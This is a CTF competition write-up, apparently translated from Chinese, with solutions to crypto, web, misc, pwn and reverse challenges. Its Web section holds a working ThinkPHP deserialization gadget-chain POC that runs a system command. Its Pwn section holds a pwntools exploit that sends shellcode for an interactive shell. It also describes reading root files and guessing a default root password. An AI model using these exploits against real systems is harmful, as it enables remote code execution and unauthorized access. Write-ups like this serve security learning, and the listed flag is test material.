I took 10 exams, all of them were bad questions, and my scores were very low. The CTF ranking is 186, and I thought it was safe to enter the divisional competition. Including theoretical questions, there are more than 1,500 people, and there are more than 200 people in Southeast China. I can't get in, and WriteUp doesn't want to upload it.
Crypto
I’m not a password player, but I’ve come up with a few passwords unexpectedly.
Sign in to the radio station
Pay attention to the reminder given by the public account "Bi Shi has arrived safely", look for the Chinese code of these words, and then add them to the first 28 digits of the password in the code book given in the question digit by digit and divide by 10 to take the remainder. as follows:
Just take the remainder, remove the spaces and pass it into msg:/send?msg=
ISO9798
After nc is uploaded, it will give you a string after sha256 and part of the plaintext, so you can find the first four digits. You can use the following script to get the first four digits.
from hashlib import *
hash='加密后的'
sss='部分明文'
table='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
for ch1 in table:
for ch2 in table:
for ch3 in table:
for ch4 in table:
hashvalue=sha256((ch1+ch2+ch3+ch4+sss).encode()).hexdigest()
if hashvalue==hash:
print(ch1+ch2+ch3+ch4)
quit()
After finding the first four digits, fill them in. Then it will ask for a 128-byte numeric string, just enter it here, and then return a 96-byte string. Divide this string into one segment every 32 bits. The total three segments are rA, rB, and B. Then rB and rA are concatenated and passed in. For example, this 96-length string is 112233. Just pass in 2211. After passing in, the flag will appear.
Two-way authentication based on challenge code
After reading the document for a long time, I just asked the completion function to verify the module. I don't know and can't understand the C language. ssh connection: ssh player@IP -p port, the password is also player. After connecting, I browsed the directory and found root and found that I could enter. I had nothing to do and rummaged around, and then I found the flag, as follows
cd /root/cube-shell/instance/flag_server
cat flag1.txt
cat flag2.txt
Two-way authentication based on challenge code 2
The flag is the flag2 above
Two-way authentication based on challenge code 3
When this question was asked, the official seemed to have discovered that the first two questions did not require permission verification. Therefore, permission verification was added to this question, and the flag could not be viewed. There was no idea here, and the privilege escalation failed. When trying to obtain root permissions, suI ordered to switch users and tried many passwords. My default password for kali was toor, so I tried it, but I didn't expect it to succeed. Then just check flag2 directly. This series is very strange. It is expected to complete the verification module of the client. Several friends also expected to do it. But this unexpected question is too simple. Several questions have no meaning and are very strange.
Web
Ezpop
Refer to this https://www.freebuf.com/vuls/321546.html
Just change the dir command in the POC in the script cat /flag.txtto:
<?php
namespace think{
abstract class Model{
private $lazySave = false;
private $data = [];
private $exists = false;
protected $table;
private $withAttr = [];
protected $json = [];
protected $jsonAssoc = false;
function __construct($obj = ''){
$this->lazySave = True;
$this->data = ['whoami' => ['cat /flag.txt']];
$this->exists = True;
$this->table = $obj;
$this->withAttr = ['whoami' => ['system']];
$this->json = ['whoami',['whoami']];
$this->jsonAssoc = True;
}
}
}
namespace think\model{
use think\Model;
class Pivot extends Model{
}
}
namespace{
echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}
The output result is base64 decoded, then Urlencoded, and the result is passed to the a parameter to request index.php/index/testthe route in POST mode.
An example diagram is as follows:
Misc
ez_usb
Filter usb.src=="2.8.1"and export a specific group as 1.pcapng, filter usb.src=="2.10.1"and export a specific group as 2.pcapng
Then UsbKeyboardDataHacker.pyparse 1.pcapng with
Remove the resulting string <CAP>, and then remove <DEL>the previous letter c, because DEL represents deletion, and the previous letter input is also deleted. Then the remaining string is transferred to a rar file through the following script. The rar file I transferred using the HEX editor cannot be opened. I don’t know why.
import binascii
hex_data = '字符串'
out = open('输出的rar路径', 'wb')
out.write(binascii.unhexlify(hex_data))
out.close()
This compressed package requires a password, and the password is UsbKeyboardDataHacker.pythe string obtained by parsing 2.pcapng
Enter the password to get the flag
Questionnaire
After filling it out, because the official didn’t buy a membership, they didn’t hand it over, hahaha, I laughed to death. Then the official should buy it, and give the flag when submitting the questionnaire.
Pwn
login-nomal
exp:
from pwn import*
context.log_level = "debug"
io = remote("ip","port")
io.recv()
shellcode = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
payload = "opt:1\n" + "msg:ro0t1\n"
io.sendline(payload)
payload = "opt:2\n" + "msg:" + shellcode + "\n"
io.sendline(payload)
io.interactive()
Just pay attention to how the shellcode is written.
Reverse
baby_tree
Just open the file with text and take out the value. Just look at it. Just look at it as hard as swift. Unfortunately, I didn’t see that one. After talking to friends after the game, I found that there are many ways to write it. Here I only put one written in Python.
res=[88,35,88,225,7,201,57,94,77,56,75,168,72,218,64,91,16,101,32,207,73,
130,74,128,76,201,16,248,41,205,103,84,91,99,79,202,22,131,63,255,20,16]
key=[ord(c) for c in "345y"]
def my_encode(data,key):
b=data
k=key
for i in range(len(b)-4+1):
r0,r1,r2,r3=b[i],b[i+1],b[i+2],b[i+3]
b[i]=r2^((k[0]+(r0>>4))&0xff)
b[i+1]=r3^((k[1]+(r1>>2))&0xff)
b[i+2]=r0^k[2]
b[i+3]=r1^k[3]
k[0],k[1],k[2],k[3]=k[1],k[2],k[3],k[0]
return b==res
def my_decode(data,key):
b=data
k=key
k[0], k[1], k[2], k[3] = k[2], k[3], k[0],k[1]
for i in range(38,-1,-1):
r1=b[i+3]^k[3]
r0=b[i+2]^k[2]
r3=b[i+1]^((k[1]+(r1>>2))&0xff)
r2=b[i]^((k[0]+(r0>>4))&0xff)
k[1], k[2], k[3], k[0] = k[0], k[1], k[2], k[3]
b[i], b[i + 1], b[i + 2], b[i + 3] = r0, r1, r2, r3
print("".join(chr(i) for i in b))
my_decode(res,key)
The flag is:flag{30831242-56db-45b4-96fd-1f47e60da99d}
I did ten of them and solved 50% of them. It’s very annoying that I didn’t make it to the divisional round. The setting of theoretical questions makes people want to drive a dump truck and create a designer!